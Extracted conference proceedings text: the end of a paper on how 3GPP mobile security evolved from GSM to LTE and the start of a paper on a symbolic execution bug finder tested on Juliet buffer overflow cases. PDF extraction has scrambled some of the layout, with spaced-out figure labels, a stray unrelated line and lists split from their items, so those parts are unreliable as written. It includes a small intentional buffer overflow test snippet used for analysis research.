omissions and shortcomings to GSM security. This is not
strange as the 2G systems do not have a security architecture as
such; it is more akin to a collections or measures put together
without well-defined requirements. The following list (derived
in [6]) identifies some of the flaws. Even with all these flaws,
the GSM/GPRS system has been a remarkably secure system.
However, some 25 years down the line and the shortcomings
have become serious liabilities. There are also a number of
174
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
implementations issues [7]. The list is not fair with regard to
the threats found early on, but it is certainly valid now.
•
One-way authentication is utterly inadequate
U s e r E q u ip m e n t (U E )
H o m e E n v ir o n m e n t(H E )
S e r v in g N e tw o r k (S N )
A c c e s s N e tw o rk (A N )
U IC C /
U S IM
M E
R N C
M A P _ S e n d A u th In fo (IM S I)
D u h a r f o r lit e å g j ø r e !
•
Delegated authentication is naive trust-wise
•
No inter-operator authentication
•
No way to authenticate system nodes
•
No uniqueness/freshness to challenges
•
Unauthenticated plain-text transfer of security credentials
•
Unprotected key transfer
•
Missing key binding and too short keys
•
Key refresh dependent of re-authentication
•
Missing expiry condition on security context
•
Weak A3/A8 functions and no key-deriving key structure
•
Short A5 key stream cycle and key stream re-use
•
Redundant and structured input to A5 (expand-then-encrypt)
•
Highly redundant input to A5 (in signaling message)
•
Protection coverage/range too short (only MS – BTS)
•
Missing integrity protection
•
Weak/inadequate identity/location privacy
•
No core network control plane (signaling) security features
•
No core network user plane protection
•
No IP protection (GPRS)
•
No mobile phone (MS) platform security
H L R /
A u C
V L R /
S G S N
T e le n o r
T e le n o r
N o d e B
M A P _ S e n d A u th In fo -a c k (A V )
C h a lle n g e ( R A N D ,A U T N )
R e s p o n s e (R E S )
B. 3G Security
1) Background and Requirements: Security in the UMTS
system is described briefly in [6, 8] and in considerable depth
in [9]. The main security specification is TS 33.102 [10].
One also provided a “Security Objectives and Principles”
[11] background document, as well as conducting a threats
and requirements analysis [12]. One also introduced Network
Domain Security (NDS), which includes IPsec profiles for
use with 3GPP systems [13] and a standard set of public-key
infrastructure (PKI) protocols and methods [14].
2) The 3G Security Architecture: The UMTS security architecture, depicted in Figure 2, is an important overhaul of
the GSM security, yet the underlying system model remains
much the same. Amongst the features are:
•
New subscriber card (UICC) with security module (USIM)
•
Introduction of 128-bit crypto primitives
•
Improved two-way AKA algorithm (UMTS AKA)
•
Introduction of core network protection (IP protocols)
Sadly, backwards compatibility concerns also dictated that
the GSM SIM could still be used, which re-introduces many
if not most of the 2G weaknesses.
3) The IP Multimedia Subsystem (IMS): IMS came with
UMTS (Rel.5). We do not include IMS in our discussions as
it is an optional service-level feature.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
K e y tra n s p o rt
(C K ,IK )
K e y tra n s p o rt (C K ,IK )
S c o p e o f
c o n fid e n tia lity a n d in te g r ity
Figure 2: UMTS security
4) Omissions and Shortcomings: The 3G security is substantially better and more future proof than the 2G security,
and one really has a security architecture. The architecture
is by no means perfect or complete, but it does at least
capture the main risks/threats and defines what one wants to
protect. Completeness will always be an issue, but in the 3G
systems we also have that there sometimes is a considerable
mismatch between stated goal and what the mechanisms
achieve. A case in point would be the identity/location privacy
requirements, which does capture the problem well, but the
mechanisms that should provide the necessary services are
woefully inadequate. They are however a) exactly the same
as for the 2G systems and b) they are intimately tied to
the identity presentation scheme defined in the basic mobility
management (MM) protocol machinery (discussed in [6, 15]).
Making changes here would have been a major undertaking,
and since there was considerable time pressure to complete the
3G standard, improvements to identity/location privacy simply
did not happen (there were efforts investigating the possibilities
during the Rel.99 design).
Many of the items on the 2G list of omissions and
shortcomings are mitigated and resolved, but suffice to say
that many of the 2G weaknesses were inherited or permitted
through backwards compatibility requirements. Another main
problem with 3G security is the limited scope.
C. 4G Security
1) Background and Requirements: The book “LTE Security” [16] is good and thorough introduction. The main security
standard for LTE is TS 33.401 [17]. LTE and LTE-A are very
similar with respect to the security architecture, which for
historical reasons is called the “System Architecture Evolution
(SAE)” security architecture. The term Evolved Packet System
(EPS) is also used.
The radio access architecture changed significantly with
LTE and this triggered large-scale changes to the whole
system, including the security architecture. The security requirements were retained more or less as-is. For compatibility
reasons and due to time constraints during the design phase,
the UMTS AKA protocol was retained as a component of the
EPS AKA protocol.
2) The 4G Security Architecture: The LTE security architecture has a lot in common with 3G security, but with some
important changes. Amongst the LTE features are:
•
UICC/USIM is retained and required
175
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
Introduction of full key-deriving key hierarchy
•
Session keys not dependent on re-authentication
•
Auth. master key (KASM E ) bounded to VPLMN id.
•
New session keys for every handover
•
Separation of user plane and control plane protection
•
Introduction of improved AKA algorithm (EPS AKA)
the mobile devices must have a minimal level of protection.
This is not only to protect the user, which a HPLMN should
be interested in anyhow, but also to protect the network as
a population of broadband devices could disrupt the access
network. Distributed Denial-of-Service (DDoS) attacks would
be but one possibility.
D. Architectural Oddities
A welcome change is that backwards compatibility with
GSM SIM is prohibited for access to E-UTRAN. UMTS
AKA derived security contexts can be used (mapped) to LTE
contexts. Figure 3 depicts the EPS key hierarchy, which is very
different from the 2G/3G schemes. The new key derivations
take place exclusively outside the UICC/USIM. This makes
for a significant departure from previous practices.
K
N A S i n t
K
N A S e n c
K
R R C i n t
K
R R C e n c
K
U P e n c
M E a n d M M E
U I C C /U S I M
a n d H S S
M E a n d H S S
P e rm a n e n t se c re t
fo r th e s u b s c rip tio n
P ro d u c e d b y
" U M T S A K A "
p a rt
K
M E a n d e N o d e B
A S M E
P ro d u c e d b y
S 1 0 k e y d e riv a tio n
K
e N B
P ro d u c e d b y
S 1 1 k e y d e riv a tio n
(a ls o S 1 2 a n d S 1 3 )
P ro d u c e d b y S 1 5 k e y d e riv a tio n
C K , I K
K
Figure 3: The EPS key hierarchy
3) Omissions and Shortcomings: The list of omissions and
shortcoming is shorter for LTE, but there are also new threats.
In a world of smart phones, it is obvious that 128-bit crypto
on the access link may count for nothing if the mobile phone
is infested with malicious Apps. Likewise, the networks are
often hybrid systems, and it is common to have base stations
that are 2G/3G/4G compliant. With different security levels
and common hardware/software, it is clear that strong 4G
protection may easily be offset with weak 2G/3G protection.
For 4G this is quite important, as the mesh architecture means
that all eNBs will be able to reach all other eNBs. Thus, one
compromised eNB can reach all other eNBs in the network
segment (which may span the entire operator network). It
is also clear that many of the nodes, including the base
station (BTS/NB/eNB) may be running commodity operating
systems (OS). The chosen OS, likely a Linux variant, may
be reasonably secure, but even a high-security OS will have
weaknesses and must be properly managed to remain secure.
Also, introduction of firewalls and intrusion detection systems
will be required for these systems now. Server hardening is
a must, and even so it is clear that not all attacks can be
prevented. This means that prevention alone cannot be a viable
future strategy.
The EPS security architecture does require the eNB to be
secure, but the specification is not very specific [17]. It also
has recommendations on use of firewalls, but the specification
is quite vague on this subject too. For a greenfield 4G system,
the security may be quite good at what the system provides,
but the standard system does not do all it needs to do.
Also, it is obvious that even though the user equipment (UE)
normally is not owned or controlled by the network operator,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
One puzzling aspect of the 3GPP security architectures
is that while identity presentation and entity authentication
is fully standardized, there is no authorization mechanisms
present. There are of course mechanisms to discriminate subscriber based on the type of subscription, but these schemes
are not a feature of the security architecture.
Another aspect to be noted is that the subscriber identity
that actually is authenticated, the IMSI, is basically a link layer
identifier. Since there is only basic connectivity present at the
link layer it may help explain why there never was any built-in
authorization scheme in the 3GPP security architecture.
III.
E VOLVING S ECURITY A RCHITECTURE
A. Why Change the Security Architecture?
The short answer is that we need to change the security
architecture because some of the premises for the original
security architecture have changed. A slightly longer answer
would revolve around the following aspects.
B. High-level change triggers
There are many high-level change triggers, amongst others:
•
Changes to the assets of the system
This could include changes to the value of the existing
assets, inclusion of new assets or removal of assets.
•
Changes in the threats towards the assets
This includes assets exposure, new intruders, new
intruder capabilities. For new assets it could also
include missing or mismatched protection.
•
Changes to the system context
The system may initially have played a limited role,
but may have evolved into something more.
C. Evolution aspects
Large-scale long-lived systems cannot remain as static
objects for long. Instead, they must be dynamic and adapt to
changing environments.
•
Evolving Target System
If the target system changes, then this will likely affect
the security architecture. Still, the nature of the change
may be such that it does not trigger a need for updating
the security architecture.
•
Evolving Security Architecture - Externally triggered
The security architecture may need updates and modifications due to external circumstances, or even completion of planned features that were not initially fully
specified. Changes in the threats towards the assets, the
exposure of the assets, and the number of users will
176
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
also affect the system. It could also involve changing
trust-relationships and changes to value of the assets.
•
Evolving Security Architecture - Internally triggered
Change in use. The internal circumstances would encompass altered or increased use, which would include
changes to the assets of the system.
•
Security Evolution History
An evolving system is obviously a product of its
history. Decisions taken during the design of GSM
still have an impact on LTE. For instance, the basic
identity presentation scheme essentially remains the
same for LTE as for GSM [18, 19].
•
Societal Impact
When a system reaches certain thresholds it will take
on a new role. It enters a state of criticality to society
and will become an object of regulatory interest. The
critical infrastructure (CI) requirements, will focus on
system survival and service availability rather than
security and privacy for the individual.
•
IV.
Privacy
Privacy requirements may not have mattered too much
for a small system with few users back in the early
1990ties. Today privacy requirements are often mandated by laws and regulations.
A SSUMPTIONS R EGARDING S YSTEMS , S ECURITY
AND C RYPTOGRAPHIC C HARACTERISTICS
The following set of assumptions not all be true for all
systems, but we advocate assuming that they are true.
A. Assumptions about Successful Systems
We assume that when people start to design a system they
intend it to be successful. Thus, they must therefore take the
above into account in their design. Our high-level assumptions
about a successful system:
1)
2)
3)
4)
5)
6)
7)
8)
9)
10)
11)
12)
It
It
It
It
It
It
It
It
It
It
It
It
will outlive its intended lifetime (and design)
will have many more users then originally intended
will need to scale its services cost-effectively
will become highly valuable (many/valuable assets)
will outlive its base technologies
may become a critical system (company, organization)
may become a critical infrastructure (society-at-large)
will spawn unsuccessful branches/features
will have to deal with multi-vendor cases
will need to operate with multiple releases in place
must encompass all of operations & maintenance too
will be subject to regulatory interventions
B. Assumptions about System Security
Our assumptions about a long-lived security architecture:
1)
2)
3)
4)
5)
6)
7)
8)
The assets will change (value/number/types)
The principal parties will change and multiply
The threats will change
Trust models will fail (and/or become outdated)
Trust will be betrayed
Risk evaluations will be outdated
The weaknesses, vulnerabilities and exposure will change
The intruders will become more powerful and proliferate
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
9)
10)
11)
12)
13)
14)
15)
16)
17)
18)
19)
20)
21)
22)
23)
24)
25)
26)
27)
28)
Attacks will only be better over time
There will be security incidents
Scalability in security mechanisms will be decisive
No single security scheme or approach will be sufficient
Effective and efficient defense-in-depth will be needed
Pro-active security protection will not be sufficient
Re-active security will be very important (detect & respond)
Ability to handle large incidents will be required
Mitigation and recovery must be supported
Pervasive resilience and robustness is required
Autonomous sub-system response will become important
There will be security architecture omissions
There will be security compatibility issues (multi-vendor)
There will be security compatibility issues (multi-release)
Fixing minor security wholes can take a very long time
Fixing the security architecture take years (next generation)
Security management will be crucial
Security configuration management is crucial
Security migration methods should be built-in
Privacy will become ever more important
C. Assumptions about Cryptographic Solutions
Our assumptions related to cryptographic solutions:
1)
2)
3)
4)
5)
6)
7)
8)
The cryptographic base functions must be future-proof
Cryptographic primitives will be broken (or too weak)
Key sizes will be changed
Security protocols will be broken (or too weak)
Cryptographic parameters will need to be negotiated (securely)
Cryptographic primitives will need to be revoked
Implementations will contain weaknesses
Management of cryptographic elements will be crucial
It is clear that the basic boot-strapping fundament must be
very solid. This minimal base is what you will depend on if you
need to boot-strap new security solution and new cryptographic
primitives in the rest of the security architecture. It needs to
contain enough to support boot-strapping and it needs to be
future-proof. Efficiency is not a main priority here.
D. The Scalability War
The classical Dolev-Yao Intruder (DYI) is not the most
realistic intruder [20]. Real intruder will use any available
means (subversion, physical intrusion, tricking the principals),
ultimately being as powerful as a DYI. There is a reasonably
body of papers detailing various intruder model, but suffice to
say that a modern CI system must be able to handle all types of
intruders. And many of them! This essentially means that the
system must have efficient as well as effective protection, and
that mechanisms that do not scale well, compared to intruder
capabilities, will be doomed to fail in the long run.
Our assumptions related to scalability and efficiency:
1)
2)
3)
4)
5)
6)
Security scalability will be a major concern
Efficiency is highly important
Effectiveness is imperative for core mechanism
Auxiliary defense-in-depth solution are needed
Avoid specific-attack measures if at all possible
Security management must scale well
Assumption three and four are apparently somewhat at
odds, but in the end assumption three can be supported given
that these means are complementary and cost-effective. See
177
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
also considerations about the economy of attacks and defenses
outlined in [21], This indicates that for broad sweeping attacks,
even quite weak mechanisms may successfully thwart the
attacks. Measures that are only effective for one specific attack
should be avoided.
E. Other Concerns
1) Passive Regulatory Authorities: One main concern is
that the regulatory authorities generally are quite passive with
regard to security requirements. This is apparent for the cellular
system and regulations concerning the operators. The 3GPP
standards are by no means perfect or complete, but it is still the
case that many of the standardized and recommended security
mechanisms are not deployed in the networks. The regulatory
authorities are generally more reactive than proactive, unless
they have a clear political mandate to be stringent. One should
also be concerned about regulations just subsequent to a
major public incident, since it is likely that the urge to “do
something” is strong while it is also likely that one focuses
narrowly on details. One may end up with security theater, as
coined by Schneier [22].
Part of this problem is a that one sometimes ends up with a
lot of attention to correct and strengthen unimportant features.
To do something right is not enough, one must also do the
right thing.
2) False Security: Security theater may over time develop
into the more elaborate cargo cult security type of deception.
Then the main functions and mechanisms may all be there
(or mimicked closely), but with some vital part missing or
done completely wrong. Cargo cultism is defined by “perfect
form”, but it simply does not work as intended. Feynman has
an amusing description of “cargo cult science” that nicely
illustrates the principles [23]. Since security can be very
difficult to get right and to verify, cargo cult security may
look like the real deal.
3) Security Testing and Security Configuration: In [7] the
authors clearly also demonstrate that not only is not all security
options exercises, but that, unsurprisingly, there are implementation weaknesses and vulnerabilities. The ASMONIA project
provides many more examples of weakness, vulnerabilities and
risks facing a mobile system [24]. The ASMONIA project
published a lot of useful documents for operators wanting
to improve their security level. The documents also include
advice and methods for how to test the security. The EU
body ENISA provides a lot of useful security-related input,
but generally have no mandate to impose security [25]. When
it comes to IP network security and server security there is a
large body of standards and methods for how to design and test
security hardening [26–29]. There are also various checklists
available [30].
V.
L ESSONS L EARNED
Security policies will be affected by changes to these assumptions. This is a process oriented task that must take place both
for the design phase and for the deployed system(s).
B. Rock Solid Bootstrapping Security
There needs to be a rock solid fundament that will be
secure for the foreseeable future. The smart-card has served
this purpose in the 3GPP systems on the subscriber side. The
smart-card is not tamper-proof, but it has successfully served
as a high-trust platform.
C. Planned Deprecations
A scalable and evolving system must be able to handle
deprecation of almost all cryptographic algorithm, security
protocols and security services. The deprecation, needless
to say, must be conducted in a secure manner. Backwards
compatibility requirements and fallback solutions must be
handled in a secure way.
D. Negotiable and Adaptable
Given that one must plan for deprecation of security
features/services, one must also plan how to negotiate new
features/services. This feature must be built-in and have high
assurance. Adaptation may be necessary to account for local
requirements, but is vital that adaptations must be fully compliant with a well-defined security policy.
E. Proactive & Reactive Security
Basic security functionality to identify and authenticate
principals and entities is necessary, but not sufficient. Adding
authorization, protected storage and protect communication is
also necessary, but still not sufficient. More may be added,
but in the end it is impossible to fully secure the system.
This means that one must handle and deal with incidents.
There is therefore a clear need for intrusion detection and
response systems, to deploy firewalls, anti-virus protection,
secure backups, secure audit trails etc. The reactive measures
must be included in the overall system security plans and
subject to revisions as need be.
F. Stability, Resilience and Recovery
System integrity is imperative to ensure a stable and resilient system. System integrity is a system-level characteristic
and does not preclude partial or local failures. What is imperative is to prevent the failures to scale. Failures, whether manmade intentional or unintentional, cannot entirely be prevented.
Procedures that support mitigation and recovery must be an
integral part of the overall system security plan.
G. Configuration Management
Proper planned configuration management, which must
include security functionality, is an absolute necessity.
A. Verify Assumptions
H. Privacy Matters
One must verify assumption about the system and the
security periodically or when there are substantial changes to
the system. That is, an audit is called for to verify assumptions
about the assets, the principal entities, trust relationships etc.
Privacy is one feature that must be accounted for in all
systems that include human users or any kind of data pertaining
to humans. This must be planned for from the design phase
and handled in all phases of system deployment.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
178
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
VI.
C ONCLUDING R EMARKS
The results in this paper cannot be said to be fully
supported by the evidence provided in this paper (or in the
referenced papers). They are neither rigorous nor complete.
This is to be expected for such a complex issue. Thus, while
the results may be valid and true, they will hardly be complete
and not always necessary either. That is, the usual “necessary
and sufficient” conditions are not really there. Still, experience
and empirical evidence should not be discounted, and we
advocate that the lessons learned are taken into account, not as
mathematical axioms, but inputs to be considered. We therefore
recommend that scalable evolving security architectures should
be designed with these assumption as background.
In this paper, we have outlined the 3GPP security architecture as it has evolved over more than 25 years. From being an
auxiliary service for the few, it has grown to literally cater to
billions of subscribers, and the number and types of services
provided has changed dramatically over the years. The usepatterns of these systems has changed as well. All in all, there
has been a complete transformation of almost all aspects of
these systems. During this process, the security architecture
has evolved with the system and the changing system context,
though not without some noticeable failures and a growing
number of security problems.
We have argued that to achieve scalable security architectures that are able to evolve over time, one needs to take into
account the fact that almost all assumption one initially had
will become false or moot. This means that adaptability and
ability to support changes is crucial. This is important in a
world where the internet-of-things (IoT) landslide is about to
happen and where the systems will be ever more important.
In the wake of the Snowdon revelations, it is also clear that
cyber-security is under constant pressure, and while we do not
want to over-state the Snowdon case per se, it should be clear
that the cyber-war methods will (over time) become available
to many organizations and individuals. So we need to learn
how to cope with this and do so fast.
R EFERENCES
[1] European Parliament/European Council, “Directive 2006/24/EC of the
European Parliament and of the Council of 15 March 2006 on the
retention of data generated or processed in connection with the provision
of publicly available electronic communications services or of public
communications networks and amending Directive 2002/58/EC,” EU,
Directive 24/EC, 2006.
[2] 3GPP, TS 43.020, “Security related network functions,” 3GPP, France,
TS 43.020 (2G), 2014.
[3] J. R. Rao, P. Rohatgi, H. Scherzer, and S. Tinguely, “Partitioning attacks:
or how to rapidly clone some gsm cards,” in Security and Privacy, 2002.
Proceedings. 2002 IEEE Symposium on. IEEE, 2002, pp. 31–41.
[4] M. Kalenderi, D. Pnevmatikatos, I. Papaefstathiou, and C. Manifavas,
“Breaking the gsm a5/1 cryptography algorithm with rainbow tables and
high-end fpgas,” in Field Programmable Logic and Applications (FPL),
2012 22nd International Conference on. IEEE, 2012, pp. 747–753.
[5] P. Papantonakis, D. Pnevmatikatos, I. Papaefstathiou, and C. Manifavas,
“Fast, fpga-based rainbow table creation for attacking encrypted mobile communications,” in Field Programmable Logic and Applications
(FPL), 2013 23rd International Conference on. IEEE, 2013, pp. 1–6.
[6] G. M. Køien, Entity authentication and personal privacy in future
cellular systems. River Publishers, 2009, vol. 2.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
[22]
[23]
[24]
[25]
[26]
[27]
[28]
[29]
[30]
F. van den Broek, B. Hond, and A. Cedillo Torres, “Security Testing of
GSM Implementations,” in Engineering Secure Software and Systems,
ser. Lecture Notes in Computer Science, J. Jürjens, F. Piessens, and
N. Bielova, Eds. Springer International Publishing, 2014, vol. 8364,
pp. 179–195.
G. M. Køien, “An introduction to access security in UMTS,” Wireless
Communications, IEEE, vol. 11, no. 1, Feb 2004, pp. 8–18.
V. Niemi and K. Nyberg, UMTS Security. John Wiley & Sons, 2003.
3GPP, TS 33.102, “3G Security; Security architecture,” 3GPP, France,
TS 33.102 (3G), 2014.
3GPP, TS 33.120, “Security Objectives and Principles,” 3GPP, France,
TS 33.120 (3G), 2001.
3GPP, TS 21.133, “3G security; Security threats and requirements,”
3GPP, France, TS 21.133 (3G), 2001.
3GPP, TS 33.210, “3G security; Network Domain Security (NDS); IP
network layer security,” 3GPP, France, TS 33.210 (NDS/IP), 2012.
3GPP, TS 33.310, “Network Domain Security (NDS); Authentication
Framework (AF),” 3GPP, France, TS 33.310 (NDS/AF), 2014.
G. M. Køien, “Privacy enhanced cellular access security,” in Proceedings of the 4th ACM workshop on Wireless security. ACM, 2005, pp.
57–66.
D. Forsberg, G. Horn, W.-D. Moeller, and V. Niemi, LTE security. John
Wiley & Sons, 2012, vol. 1.
3GPP, TS 33.401, “3GPP System Architecture Evolution (SAE); Security architecture,” 3GPP, France, TS 33.401 (3G), 2014.
G. M. Køien, “Privacy enhanced mutual authentication in LTE,” in
Wireless and Mobile Computing, Networking and Communications
(WiMob), 2013 IEEE 9th International Conference on. IEEE, 2013,
pp. 614–621.
G. Køien, “Mutual entity authentication for LTE,” in Wireless Communications and Mobile Computing Conference (IWCMC), 2011 7th
International. IEEE, 2011, pp. 689–694.
D. Dolev and A. C. Yao, “On the Security of Public-Key Protocols,”
IEEE Transactions on Information Theory, vol. 29, no. 2, 3 1983, pp.
198–208.
D. Florêncio and C. Herley, “Where do all the attacks go?” in Economics of Information Security and Privacy III. Springer, 2013, pp.
13–33.
B. Schneier, “Beyond fear,” Copernicus Book, New York, 2003.
R. P. Feynman, “Cargo cult science,” in Surely You’re Joking, Mr.
Feynman, 1st ed. W. W. Norton, 1985, Originally a 1974 Caltech
commencement address.
“The ASMONIA project,” See www.asmonia.de, 2014.
“ENISA - European Union Agency for Network and Information
Security,” See www.enisa.europa.eu/, 2014.
K. Scarfone, W. Jansen, and M. Tracy, “Guide to General Server
Security,” NIST, Gaithersburg, MD 20899-8930, Special Publication
800-123, 2008.
Z. Anwar, M. Montanari, A. Gutierrez, and R. H. Campbell, “Budget
constrained optimal security hardening of control networks for critical
cyber-infrastructures,” International Journal of Critical Infrastructure
Protection, vol. 2, no. 1, 2009, pp. 13–25.
R. Dewri, I. Ray, N. Poolsappasit, and D. Whitley, “Optimal security
hardening on attack tree models of networks: a cost-benefit analysis,”
International Journal of Information Security, vol. 11, no. 3, 2012, pp.
167–188.
R. Dewri, N. Poolsappasit, I. Ray, and D. Whitley, “Optimal security
hardening using multi-objective optimization on attack tree models of
networks,” in Proceedings of the 14th ACM conference on Computer
and communications security. ACM, 2007, pp. 204–213.
NIST, “Security configuration checklists program,” See http://csrc.nist.
gov/groups/SNS/checklists/, 2014.
179
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A Backtracking Symbolic Execution Engine
with Sound Path Merging
Andreas Ibing
Chair for IT Security
TU München, Germany
Email: andreas.ibing@tum.de
Abstract—Software vulnerabilities are a major security threat and
can often be exploited by an attacker to intrude into systems.
One approach to mitigation is to automatically analyze software
source code in order to find and remove software bugs before
release. A method for context-sensitive static bug detection is
symbolic execution. If applied with approximate path coverage,
it faces the state explosion problem. The number of paths in
the program execution tree grows exponentially with the number
of decision nodes in the program for which both branches are
satisfiable. In combination with the standard approach using
the worklist algorithm with state cloning, this also leads to
exponential memory consumption during analysis. This paper
considers a source-level symbolic execution engine which uses
backtracking of symbolic states instead of state cloning, and
extends it with a sound method for merging redundant program
paths, based on live variable analysis. An implementation as plugin extension of the Eclipse C/C++ development tools (CDT) is
described. The resulting analysis speedup through path merging
is evaluated on the buffer overflow test cases from the Juliet test
suite for static analyzers on which the original engine had been
evaluated.
Keywords–Static analysis; Symbolic execution.
I. I NTRODUCTION
Software vulnerabilities like, e.g., buffer overflows can in
many cases be exploited by an attacker for remote code execution. Automated bug detection during software development
and for releases are a main component of application security
assurance.
Symbolic execution [1] is a static program analysis method,
where software input is regarded as variables (symbolic values). It is used to automatically explore different paths through
software, and to compute path constraints as logical equations
(from the operations with the symbolic input). An automatic
theorem prover (constraint solver) is then used to check program paths for satisfiability and to check error conditions for
satisfiability. The current state of automatic theorem provers
are Satisfiability Modulo Theories (SMT) solvers [2], the
standard interface is the SMTlib [3]. An example state-of-the
art solver is [4].
Automatic analysis tools which rely on symbolic execution
have been developed for the source-code level, intermediate
code and binaries (machine code). Available tools mostly
analyze intermediate code, which exploits a small instruction
set and certain independence of programming language and
target processor. Examples are [5] and [6], which analyzes
LLVM code [7]. An overview of available tools is given in
[8][9][10]. Symbolic execution on the source-code level is also
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
interesting for several reasons. An intermediate representation
loses source information by discarding high-level types and the
compiler lowers language constructs and makes assumptions
about the evaluation order. However, rich source and type
information is needed to explain discovered bugs to the user
[11] or to generate quick-fix proposals. An example of a
source-level symbolic execution engine for C/C++ is [12],
which uses the parser and control flow graph (CFG) builder
from Eclipse CDT [13].
During symbolic execution, the engine builds and analyzes
satisfiable paths through programs, where paths are lists of
CFG nodes. Always restarting symbolic execution from the
program entry point for different, partly overlapping program
paths (path replay) is obviously inefficient. The standard
approach is therefore the worklist algorithm [14]. Symbolic
program states of frontier nodes (unexplored nodes) of the
program execution tree are kept in memory, and at program
branches the respective states are cloned. The reuse of intermediate analysis results with state cloning has the downside of
being memory-intensive. [5] uses state cloning with a recursive
data structure to store only state differences. Another approach
for engine implementation is symbolic state backtracking [12].
It keeps only the symbolic program states along the currently
analyzed program path in memory (stored incrementally with
single assignments) and avoids the inefficiency of path replay
as well as the exponential memory consumption of state
cloning.
The program execution tree grows exponentially with the
number of decisions in the program for which both branches
are satisfiable. Straight-forward application of symbolic execution with approximate path coverage (where the number of
unrolled loop iterations is bounded) is therefore not scalable.
This is often called the path explosion problem. In [15] it
is noted that program paths can be merged when the path
constraints differ only in dead variables, because further path
extension would have the same consequences for the paths.
It presents an implementation which extends [5]. This implementation uses a cache of observed symbolic program states
and introduces a type of live variables analysis which it calls
read-write-set (RWSet) analysis.
Interesting properties of bug detection algorithms are
soundness (no false negative detections) and completeness (no
false positives). Because a bug checker cannot be sound and
complete and have bounded runtime, in practice bug checkers
are evalutated with measurement of false positive and false
negative detections and corresponding runtimes on a sufficiently large bug test suite. The currently most comprehensive
180
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
If
else
:StartNode
then
else
then
4
then
else
else
merge
then
3
merge
then
1
2
:DecisionNode
global_returns_t_or_f()
:BranchNode
then
:BranchNode
else
:PlainNode
charvoid cv_struct;
:PlainNode
charvoid cv_struct;
Figure 1. Sequence of three decisions and corresponding branches (left); the
execution tree under the assumption that all branches are satisfiable splits
into 23 = 8 leafs (middle); path merging folds the execution tree (right).
:PlainNode
cv_struct.y = (void *)SRC_STR;
:PlainNode
cv_struct.y = (void *)SRC_STR;
:PlainNode
memcpy(cv_struct.x, SRC_STR,
sizeof(cv_struct.x));
:PlainNode
memcpy(cv_struct.x, SRC_STR,
sizeof(cv_struct));
C/C++ bug test suite for static analyzers is the Juliet suite [16].
Among other common software weaknesses [17] it contains
buffer overflow test cases. In order to systematically measure
false positives and false negatives, it contains both ’good’ and
’bad’ functions, where ’bad’ functions contain a bug. It further
combines ’baseline’ bugs with different data and control flow
variants to cover the languages grammar constructs and to test
the context depth of the analysis. The maximum context depth
spanned by a flow variant is five functions in five different
source files.
This paper develops and evaluates a sound path merging
method in a source-level backtracking symbolic execution engine. The implementation extends [12]. The remainder of this
paper is organized as follows. Section II describes the design
decisions. Section III gives an overview of the implementation
in Eclipse CDT. Section IV presents results of experiments
with buffer overflow test cases from the Juliet suite. Section
V discusses related work and section VI then discusses the
presented approach based on the results.
:PlainNode
cv_struct.x[(sizeof(cv_struct.x)/sizeof(
char))-1] = '\0';
:PlainNode
cv_struct.x[(sizeof(cv_struct.x)/sizeof(
char))-1] = '\0';
:JumpNode
:JumpNode
:ConnectorNode
:ExitNode
return; // fake
Figure 2. Control flow graph for example function from Figure 3. with
buffer overflow in the then branch.
II. M ERGE P OINTS AND C ONTEXT C ACHE
A. Dead and live variables
Paths can be merged without any loss in bug detection
accuracy when the path constraints differ only in dead variables. The detection of such merge possibilities requires a
context cache at potential merge points. Also required is a
way to detect dead variables and to filter them from the path
constraint. Potentially interesting merge points are therefore
program locations where the sets of dead and live variables
change. Such points are function start and function exit and
after scope blocks like if / else or switch statements and
loops.
at intermediate points. The approach merges paths which have
split inside the same function, possibly with other function
calls in between. It needs to know the set of variables which
have been written since the merge paths have split. This is
overapproximated by the set of variables written since entering
the function which is left at the program location in question.
A set of potentially read variables along path extensions is not
computed. From the set of variables which have been written
as local context (i.e., since function entry), global variables,
the return value and all variables which have been written
through pointers (pointer escape, potential write to other stack
frame etc.) are assumed as live. The remaining written local
variables are soundly assumed as dead. The local context is
then reduced by removing the dead variables. A context cache
is used to lookup observed reduced local contexts from pairs
of a function’s exit node (in the function’s control flow graph)
and call context. During symbolic execution, at each exit node
the context cache is queried for a merge possibility. Then, the
current path is pruned (merged) if possible, otherwise the local
reduced context is added as new entry to the context cache.
B. Design decisions
The idea of merging program paths during symbolic execution is illustrated in Figure 1. The left of the figure
shows a control flow with a sequence of three decisions and
corresponding branches. For the assumption that all branches
are satisfiable, the middle of the figure shows the execution
tree which splits into 23 = 8 leafs. The right of the figure
illustrates how path merging potentially folds the execution
tree together again. In this work, path merges are performed
at function exit. Merges are possible because stack frame
variables die at function exit. A path constraint at function exit
is treated as concatenation of the function’s call context and the
local context. The approach misses possibilities to merge paths
earlier after scope blocks inside one function. On the other
hand it does not require more complex live variable analysis
III. I MPLEMENTATION IN E CLIPSE CDT
A. Symbolic execution with symbolic state backtracking
This subsection shortly reviews [12] which is extended
by the paper at hand with path merging functionality. The
backtracking symbolic execution engine [12] uses Eclipse
CDT’s C/C++ parser to construct abstract syntax trees (AST)
from source code files. Control flow graphs (CFG) are then
constructed for function definitions rooted in AST subtrees.
CFG construction uses the ControlFlowGraphBuilder
class from CDT’s code analysis framework (Codan [13]). The
symbolic interpretation is implemented according to the treebased interpretation pattern from [18], the translator class
extends CDT’s ASTVisitor (visitor pattern [19]). The interpretation is symbolic, i.e., variable values are logic formulas.
Satisfiability queries to the SMT solver use the SMTLIB
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
181
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
typedef struct
charvoid
{
char x [ 1 6 ] ;
void ∗ y ;
void ∗ z ;
} charvoid ;
